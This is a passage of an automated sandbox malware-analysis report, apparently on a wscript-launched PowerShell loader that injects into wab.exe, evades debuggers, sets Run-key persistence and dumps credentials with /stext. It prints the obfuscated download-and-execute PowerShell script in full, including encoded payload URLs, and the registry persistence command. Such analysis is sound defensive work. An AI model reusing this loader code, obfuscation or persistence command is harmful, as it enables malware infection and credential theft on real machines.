              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,19_2_0040DD85
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5008Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4878Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5855Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3864Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 1920Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.5 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep count: 5855 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep count: 3864 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7872Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7468Thread sleep count: 1920 > 30Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 1920 delay: -5Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B210F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_22B210F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B26580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,10_2_22B26580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040AE51 FindFirstFileW,FindNextFileW,19_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,21_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,22_2_00407898
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00418981 memset,GetSystemInfo,19_2_00418981
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: wab.exe, 0000000A.00000002.2246278943.000000000051A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH%V%SystemRoot%\system32\mswsock.dll
              Source: wab.exe, 0000000A.00000002.2246278943.0000000000558000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWz
              Source: wscript.exe, 00000000.00000003.1329861249.000001C22DBA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: me ServerGoogle Chrome Elevation Service (GoogleChromeElevationService)Group Policy ClientGraphicsPerfSvcGoogle Update Service (gupdate)Google Update Service (gupdatem)Human Interface Device ServiceHV Host ServiceWindows Mobile Hotspot ServiceIKE and AuthIP IPsec Keying ModulesMicrosoft Store Install ServiceIP HelperIP Translation Configuration ServiceCNG Key IsolationKtmRm for Distributed Transaction CoordinatorServerWorkstationGeolocation ServiceWindows License Manager ServiceLink-Layer Topology Discovery MapperTCP/IP NetBIOS HelperLSMLanguage Experience ServiceDownloaded Maps ManagerMcpManagementServiceMicrosoft Edge Elevation Service (MicrosoftEdgeElevationService)Windows Mixed Reality OpenXR ServiceMozilla Maintenance ServiceWindows Defender FirewallDistributed Transaction CoordinatorMicrosoft iSCSI Initiator ServiceWindows InstallerMicrosoft Keyboard FilterNatural AuthenticationNetwork Connectivity AssistantNetwork Connection BrokerNetwork Connected Devices Auto-SetupNetlogonNetwork ConnectionsNetwork List ServiceNetSetupSvcNet.Tcp Port Sharing ServiceMicrosoft Passport ContainerMicrosoft PassportNetwork Location AwarenessNetwork Store Interface ServicePeer Networking Identity ManagerPeer Networking GroupingProgram Compatibility Assistant ServiceBranchCacheWindows Perception Simulation ServicePerformance Counter DLL HostPhone ServicePerformance Logs & AlertsPlug and PlayPNRP Machine Name Publication ServicePeer Name Resolution ProtocolIPsec Policy AgentPowerPrinter Extensions and NotificationsUser Profile ServiceWindows PushToInstall ServiceQuality Windows Audio Video ExperienceRemote Access Auto Connection ManagerRemote Access Connection ManagerRouting and Remote AccessRemote RegistryRetail Demo ServiceRadio Management ServiceRPC Endpoint MapperRemote Procedure Call (RPC) LocatorRemote Procedure Call (RPC)Security Accounts ManagerSmart CardSmart Card Device Enumeration ServiceTask SchedulerSmart Card Removal PolicyWindows BackupSecondary Log-onWindows Security ServicePayments and NFC/SE ManagerSystem Event Notification ServiceWindows Defender Advanced Threat Protection ServiceSensor Data ServiceSensor ServiceSensor Monitoring ServiceRemote Desktop ConfigurationSystem Guard Runtime Monitor BrokerInternet Connection Sharing (ICS)Spatial Data ServiceShell Hardware DetectionShared PC Account ManagerMicrosoft Storage Spaces SMPMicrosoft Windows SMS Router Service.SNMP TrapWindows Perception ServicePrint SpoolerSoftware ProtectionSSDP DiscoveryOpenSSH Authentication AgentSecure Socket Tunneling Protocol ServiceState Repository ServiceWindows Image Acquisition (WIA)Storage ServiceSpot VerifierMicrosoft Software Shadow Copy ProviderSysMainSystem Events BrokerTouch Keyboard and Handwriting Panel ServiceTelephonyRemote Desktop ServicesThemesStorage Tiers ManagementTime BrokerWeb Account ManagerDistributed Link Tracking ClientRecommended Troubleshooting ServiceWindows Modules InstallerAuto Time Zone UpdaterUser Experience Virtualization ServiceRemote
              Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: bhvB999.tmp.19.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
              Source: powershell.exe, 00000002.00000002.2065998160.00000137B1270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_21-34117
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04819AD9 LdrInitializeThunk,5_2_04819AD9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B22639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_22B22639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,19_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,19_2_004044A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B24AB4 mov eax, dword ptr fs:[00000030h]10_2_22B24AB4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B2724E GetProcessHeap,10_2_22B2724E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B22639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_22B22639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B22B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_22B22B1C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B260E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_22B260E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_7548.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7792, type: MEMORYSTR
              Maps a DLL or memory area into another process
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3A80000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: FFDCCJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (BrandmyndigheJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (BrandmyndigheJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tyyoarljemyfhm"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr';if (${host}.currentculture) {$anthranyl++;}function brandmyndighederne($emblemers){$eventyrroman=$emblemers.length-$anthranyl;$hawsing='substri';$hawsing+='ng';for( $daghesh=1;$daghesh -lt $eventyrroman;$daghesh+=2){$stumpnser+=$emblemers.$hawsing.invoke( $daghesh, $anthranyl);}$stumpnser;}function opdateringsprogrammet($etruscan){ & ($androlepsia) ($etruscan);}$garvin=brandmyndighederne 'am.o zci,l,lfai/h5 .r0b ,( w i.n,dsolw sm ,n t. 1.0a.a0 ;f aw i nu6.4,;. nx 6 4b;s trtv : 1 2s1 . 0 )v sgpe cvkiot/b2 0i1s0r0 1,0i1t sf ior esfto,xh/c1u2 1 .b0 ';$maltreated=brandmyndighederne '.urs e rc-ka g.e,n ti ';$lancinated=brandmyndighederne 'oh t,t pps :b/h/,c o.nmtae mserg as..ctowm .jduo./sn e dvstlja gpn isnsgas.. dswops>kh t tsp s :p/,/pm o,vbide srmoa crk t a,lhkb.rc o ms/,n.eodhsuloasgcnfi.nbg s,.,dswgp ';$shrugging=brandmyndighederne 's> ';$androlepsia=brandmyndighederne '.iye.xr ';$trendies='digammate';$debarrance = brandmyndighederne 'aebc.hsog %ba p pfdpawtoa %o\ap.r ogs kgr i.b.exr ensk.,buectt &c&, e c hsot kt ';opdateringsprogrammet (brandmyndighederne ' $,g l,o.b.ahl,: s.a.l g,s.e neh,efdme,rhsd=p( c mrds k/ cc ,$md e,b,avr raa,n caes) ');opdateringsprogrammet (brandmyndighederne ',$rgiluo b acl,:itri l kpaul.dtt,es=.$plaabn c,isn.artle dt.iskp lri t.(,$,sfh,rgungtgvi nmgs)f ');opdateringsprogrammet (brandmyndighederne ' [bnfeate. s ecr v,itc.e.p,o isnptvmfadn,abgfe rj]h: : s ebcgu,rti tsyupnr optuopcvosl a= t[cn eftl. sme,c.usr,iet,ysp r,ostso csoilstey pse ],:v: t ltsu1e2. ');$lancinated=$tilkaldte[0];$acupressure= (brandmyndighederne 's$ag,l o.bgapls:sskoam mhedr,f,uogdl e,n egtftcect,s = nme.ws- otbsj,egc ts .sbyrs tcetms.inseat .,wiedbkcclii edn t');$acupressure+=$salgsenheders[1];opdateringsprogrammet ($acupressure);opdateringsprogrammet (brandmyndighederne 'd$ssso mfmse r feu grlseknse t taehths .,h e a,dcebr s [b$mmfahl.t.r,e a t e d,]h=d$ gea ravrirnt ');$nourishments=brandmyndighederne 'p$kscogmlmoeer ffu,g lue.nse t t eotoss.fd.o w nfl osa d f.iulte ( $ l a,nkc i nea tfesd., $ hrj.l p.e pmr sjtfear.s ), ';$hjlpeprsters=$salgsenheders[0];opdateringsprogrammet (brandmyndighederne '.$kg,loo b.a ls:bavshp e.r.ssiao,nts 2 3,=.(stceus tk-bpnart.h s$ih jmlap,e p r,s,t e,rms )k ');while (!$aspersions23) {opdateringsprogrammet (brandmyndighe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr';if (${host}.currentculture) {$anthranyl++;}function brandmyndighederne($emblemers){$eventyrroman=$emblemers.length-$anthranyl;$hawsing='substri';$hawsing+='ng';for( $daghesh=1;$daghesh -lt $eventyrroman;$daghesh+=2){$stumpnser+=$emblemers.$hawsing.invoke( $daghesh, $anthranyl);}$stumpnser;}function opdateringsprogrammet($etruscan){ & ($androlepsia) ($etruscan);}$garvin=brandmyndighederne 'am.o zci,l,lfai/h5 .r0b ,( w i.n,dsolw sm ,n t. 1.0a.a0 ;f aw i nu6.4,;. nx 6 4b;s trtv : 1 2s1 . 0 )v sgpe cvkiot/b2 0i1s0r0 1,0i1t sf ior esfto,xh/c1u2 1 .b0 ';$maltreated=brandmyndighederne '.urs e rc-ka g.e,n ti ';$lancinated=brandmyndighederne 'oh t,t pps :b/h/,c o.nmtae mserg as..ctowm .jduo./sn e dvstlja gpn isnsgas.. dswops>kh t tsp s :p/,/pm o,vbide srmoa crk t a,lhkb.rc o ms/,n.eodhsuloasgcnfi.nbg s,.,dswgp ';$shrugging=brandmyndighederne 's> ';$androlepsia=brandmyndighederne '.iye.xr ';$trendies='digammate';$debarrance = brandmyndighederne 'aebc.hsog %ba p pfdpawtoa %o\ap.r ogs kgr i.b.exr ensk.,buectt &c&, e c hsot kt ';opdateringsprogrammet (brandmyndighederne ' $,g l,o.b.ahl,: s.a.l g,s.e neh,efdme,rhsd=p( c mrds k/ cc ,$md e,b,avr raa,n caes) ');opdateringsprogrammet (brandmyndighederne ',$rgiluo b acl,:itri l kpaul.dtt,es=.$plaabn c,isn.artle dt.iskp lri t.(,$,sfh,rgungtgvi nmgs)f ');opdateringsprogrammet (brandmyndighederne ' [bnfeate. s ecr v,itc.e.p,o isnptvmfadn,abgfe rj]h: : s ebcgu,rti tsyupnr optuopcvosl a= t[cn eftl. sme,c.usr,iet,ysp r,ostso csoilstey pse ],:v: t ltsu1e2. ');$lancinated=$tilkaldte[0];$acupressure= (brandmyndighederne 's$ag,l o.bgapls:sskoam mhedr,f,uogdl e,n egtftcect,s = nme.ws- otbsj,egc ts .sbyrs tcetms.inseat .,wiedbkcclii edn t');$acupressure+=$salgsenheders[1];opdateringsprogrammet ($acupressure);opdateringsprogrammet (brandmyndighederne 'd$ssso mfmse r feu grlseknse t taehths .,h e a,dcebr s [b$mmfahl.t.r,e a t e d,]h=d$ gea ravrirnt ');$nourishments=brandmyndighederne 'p$kscogmlmoeer ffu,g lue.nse t t eotoss.fd.o w nfl osa d f.iulte ( $ l a,nkc i nea tfesd., $ hrj.l p.e pmr sjtfear.s ), ';$hjlpeprsters=$salgsenheders[0];opdateringsprogrammet (brandmyndighederne '.$kg,loo b.a ls:bavshp e.r.ssiao,nts 2 3,=.(stceus tk-bpnart.h s$ih jmlap,e p r,s,t e,rms )k ');while (!$aspersions23) {opdateringsprogrammet (brandmyndighe
